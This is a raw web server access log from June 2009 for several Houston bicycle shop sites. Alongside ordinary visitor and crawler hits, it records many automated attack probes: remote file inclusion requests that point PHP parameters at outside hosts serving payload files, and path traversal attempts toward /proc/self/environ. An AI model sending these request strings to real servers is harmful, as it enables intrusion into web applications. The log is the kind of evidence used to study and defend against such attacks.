64.70.103.140 - - [11/Jun/2009:13:11:39 -0700] "GET /2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.70.103.140 - - [11/Jun/2009:13:11:39 -0700] "GET /logs//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.70.103.140 - - [11/Jun/2009:13:11:40 -0700] "GET /logs/access.log%20%20//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.112.121.104 - - [11/Jun/2009:13:13:35 -0700] "GET /2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.112.121.104 - - [11/Jun/2009:13:13:35 -0700] "GET /logs//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.112.121.104 - - [11/Jun/2009:13:13:35 -0700] "GET /logs/access.log%20%20//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.118.90.151 - - [11/Jun/2009:13:21:20 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
119.63.194.59 - - [11/Jun/2009:13:23:42 -0700] "GET /bullitinboard/viewtopic.php?p=14400 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
15.203.233.77 - - [11/Jun/2009:13:37:01 -0700] "GET / HTTP/1.1" 200 1764 "http://maps.google.com/maps?hl=en&ie=UTF-8&q=bicycle+sales+in+houston&fb=1&split=1&gl=us&view=text&latlng=15700537663651033245&dtab=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.svbikes.com"
204.194.98.16 - - [11/Jun/2009:13:37:42 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.svbikes.com"
122.153.28.140 - - [11/Jun/2009:13:40:26 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tropicelixirs.com/language/ct/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jun/2009:13:40:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tropicelixirs.com/language/ct/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jun/2009:13:40:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tropicelixirs.com/language/ct/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jun/2009:13:40:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tropicelixirs.com/language/ct/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jun/2009:13:40:49 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tropicelixirs.com/language/ct/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jun/2009:13:40:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tropicelixirs.com/language/ct/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
123.242.165.138 - - [11/Jun/2009:13:48:07 -0700] "GET /translations/French.txt/index.php?mailSending=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
123.242.165.138 - - [11/Jun/2009:13:48:08 -0700] "GET /index.php?mailSending=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
123.242.165.138 - - [11/Jun/2009:13:48:09 -0700] "GET /translations/index.php?mailSending=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
65.55.211.66 - - [11/Jun/2009:13:50:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.66 - - [11/Jun/2009:13:50:47 -0700] "GET /?N=D HTTP/1.1" 200 1764 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
61.247.222.56 - - [11/Jun/2009:13:52:02 -0700] "GET /bullitinboard/viewtopic.php?p=15192 HTTP/1.1" 200 533 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "bicyclestoreshouston.com"
99.188.83.225 - - [11/Jun/2009:13:57:18 -0700] "GET / HTTP/1.1" 200 1764 "http://maps.google.com/maps?source=ig&hl=en&rlz=1G1GGLQ_ENUS259&um=1&ie=UTF-8&q=bike+77055&fb=1&split=1&gl=us&ei=924xSvqcE4jCM7ukudcH&sa=X&oi=local_group&ct=image&resnum=1" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" "www.svbikes.com"
99.188.83.225 - - [11/Jun/2009:13:57:19 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" "www.svbikes.com"
99.188.83.225 - - [11/Jun/2009:13:57:20 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10" "www.svbikes.com"
122.153.28.140 - - [11/Jun/2009:14:00:44 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tropicelixirs.com/language/ct/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jun/2009:14:04:23 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tropicelixirs.com/language/ct/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.85.165.10 - - [11/Jun/2009:14:06:40 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:14:06:41 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:14:06:42 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:14:06:44 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:14:11:33 -0700] "GET /translations/Chinese-GB2312.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
70.85.165.10 - - [11/Jun/2009:14:11:33 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
70.85.165.10 - - [11/Jun/2009:14:11:35 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
70.85.165.10 - - [11/Jun/2009:14:13:32 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
194.8.74.11 - - [11/Jun/2009:14:15:39 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.svbikes.com"
194.8.74.11 - - [11/Jun/2009:14:15:39 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.svbikes.com"
194.8.74.11 - - [11/Jun/2009:14:15:40 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.svbikes.com"
72.30.79.51 - - [11/Jun/2009:14:17:56 -0700] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
84.137.40.156 - - [11/Jun/2009:14:22:58 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.google.com/search?q=You+are+not+authorized+to+access+this+page.&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:de:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "houstonbikeshop.com"
84.137.40.156 - - [11/Jun/2009:14:23:05 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.google.com/search?hl=de&client=firefox-a&rls=org.mozilla%3Ade%3Aofficial&hs=jlC&num=20&newwindow=1&q=You+are+not+authorized+to+access+this+page.+admin&btnG=Suche&lr=lang_de&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "houstonbikeshop.com"
119.63.193.141 - - [11/Jun/2009:14:26:18 -0700] "GET /bullitinboard/viewtopic.php?p=15413 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
65.55.106.188 - - [11/Jun/2009:14:42:11 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
119.63.194.90 - - [11/Jun/2009:14:45:00 -0700] "GET /bullitinboard/viewtopic.php?p=14397 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
85.17.156.17 - - [11/Jun/2009:14:53:41 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "bicyclestoreshouston.com"
85.17.156.17 - - [11/Jun/2009:14:53:41 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "bicyclestoreshouston.com"
85.17.156.17 - - [11/Jun/2009:14:53:49 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "bicyclestoreshouston.com"
85.17.156.17 - - [11/Jun/2009:14:53:59 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "bicyclestoreshouston.com"
85.17.156.17 - - [11/Jun/2009:14:56:59 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
85.17.156.17 - - [11/Jun/2009:14:56:59 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
85.17.156.17 - - [11/Jun/2009:14:56:59 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
85.17.156.17 - - [11/Jun/2009:14:56:59 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
194.8.75.94 - - [11/Jun/2009:14:59:08 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
194.8.75.94 - - [11/Jun/2009:14:59:09 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
194.8.75.94 - - [11/Jun/2009:14:59:13 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
222.231.1.113 - - [11/Jun/2009:14:59:39 -0700] "GET /skin/zero_vote/error.php?dir=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.231.1.113 - - [11/Jun/2009:14:59:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.231.1.113 - - [11/Jun/2009:14:59:39 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.231.1.113 - - [11/Jun/2009:14:59:42 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.231.1.113 - - [11/Jun/2009:14:59:42 -0700] "GET /skin/zero_vote/error.php?dir=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.231.1.113 - - [11/Jun/2009:14:59:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:15:04:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
222.231.1.113 - - [11/Jun/2009:15:05:23 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.231.1.113 - - [11/Jun/2009:15:05:27 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:15:05:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:15:13:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:15:14:42 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
194.8.74.157 - - [11/Jun/2009:15:17:36 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.svbikes.com"
61.247.222.55 - - [11/Jun/2009:15:17:36 -0700] "GET /bullitinboard/viewtopic.php?p=15945 HTTP/1.1" 200 533 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "bicyclestoreshouston.com"
194.8.74.157 - - [11/Jun/2009:15:17:39 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.svbikes.com"
194.8.74.157 - - [11/Jun/2009:15:17:40 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:15:19:12 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:15:20:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:15:24:02 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
194.8.74.47 - - [11/Jun/2009:15:24:03 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)" "www.svbikes.com"
194.8.74.47 - - [11/Jun/2009:15:24:12 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)" "www.svbikes.com"
194.8.74.47 - - [11/Jun/2009:15:24:13 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)" "www.svbikes.com"
195.254.134.50 - - [11/Jun/2009:15:25:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.254.134.50 - - [11/Jun/2009:15:25:01 -0700] "GET /skin/zero_vote/error.php?dir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.254.134.50 - - [11/Jun/2009:15:25:02 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:15:34:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:15:34:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:15:41:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
193.47.80.45 - - [11/Jun/2009:15:42:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
193.47.80.45 - - [11/Jun/2009:15:42:59 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:15:45:00 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:15:51:07 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
218.234.21.178 - - [11/Jun/2009:15:52:25 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.234.21.178 - - [11/Jun/2009:15:52:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.234.21.178 - - [11/Jun/2009:15:52:25 -0700] "GET /skin/zero_vote/error.php?dir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.234.21.178 - - [11/Jun/2009:15:59:15 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.254.134.50 - - [11/Jun/2009:16:19:39 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:16:21:22 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:16:21:23 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:16:21:23 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
222.239.227.229 - - [11/Jun/2009:16:33:36 -0700] "GET /translations/Dutch.txt///?_SERVER[DOCUMENT_ROOT]=http://www.1-zigzag.ru/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.239.227.229 - - [11/Jun/2009:16:33:36 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.1-zigzag.ru/id2.txt??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.239.227.229 - - [11/Jun/2009:16:33:38 -0700] "GET /translations///?_SERVER[DOCUMENT_ROOT]=http://www.1-zigzag.ru/id2.txt??? HTTP/1.1" 200 3861 "-" "libwww-perl/5.79" "houstonbikeshop.com"
65.55.106.220 - - [11/Jun/2009:16:42:55 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
98.200.170.188 - - [11/Jun/2009:16:56:07 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; yie8)" "www.svbikes.com"
98.200.170.188 - - [11/Jun/2009:16:56:11 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; yie8)" "www.svbikes.com"
194.8.75.92 - - [11/Jun/2009:17:34:58 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard//index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "www.svbikes.com"
194.8.75.92 - - [11/Jun/2009:17:34:58 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "www.svbikes.com"
194.8.75.92 - - [11/Jun/2009:17:34:58 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "www.svbikes.com"
190.144.44.36 - - [11/Jun/2009:17:39:28 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
190.144.44.36 - - [11/Jun/2009:17:39:28 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
190.144.44.36 - - [11/Jun/2009:17:39:28 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
190.144.44.36 - - [11/Jun/2009:17:39:28 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
190.144.44.36 - - [11/Jun/2009:17:40:25 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.144.44.36 - - [11/Jun/2009:17:40:25 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.144.44.36 - - [11/Jun/2009:17:40:25 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.144.44.36 - - [11/Jun/2009:17:40:28 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
190.144.44.36 - - [11/Jun/2009:17:44:25 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
